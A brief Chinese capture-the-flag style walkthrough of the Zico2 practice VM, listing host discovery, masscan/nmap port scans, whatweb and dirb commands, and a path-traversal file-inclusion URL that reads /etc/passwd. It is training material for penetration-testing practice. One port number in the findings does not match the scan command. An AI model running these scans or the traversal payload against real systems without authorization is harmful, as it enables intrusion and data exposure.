靶机Zico2
一、实验环境
1.靶机:Zico2
2.测试机:Kali
3.帮凶机:Windows 10
二、实验步骤
(一)信息收集
1.查看测试机的IP信息,判断所处网段
2.主机发现(netdiscover)
netdiscover -i eth0 -r 192.168.10.0/24
3.端口扫描(masscan/nmap)
masscan --rate=10000 --ports 0-65535 192.168.10.151
nmap -sV -T4 -p 111,80,52448,22 192.168.10.151
-
开启了22(ssh服务)、80(http服务)、111(rpcbind,远程过程调用,将不同服务与对应的端口进行绑定,以便支持机器间的互操作)、37495(status)端口
(二)Web渗透
1.浏览web网页(80端口)
-
发现文件包含漏洞
2.尝试利用文件包含漏洞
http://192.168.10.151/view.php?page=../../../../../etc/passwd
3.网站指纹信息扫描(whatweb)
whatweb 192.168.10.151
4.目录扫描(dirb)
dirb http://192.168.10.151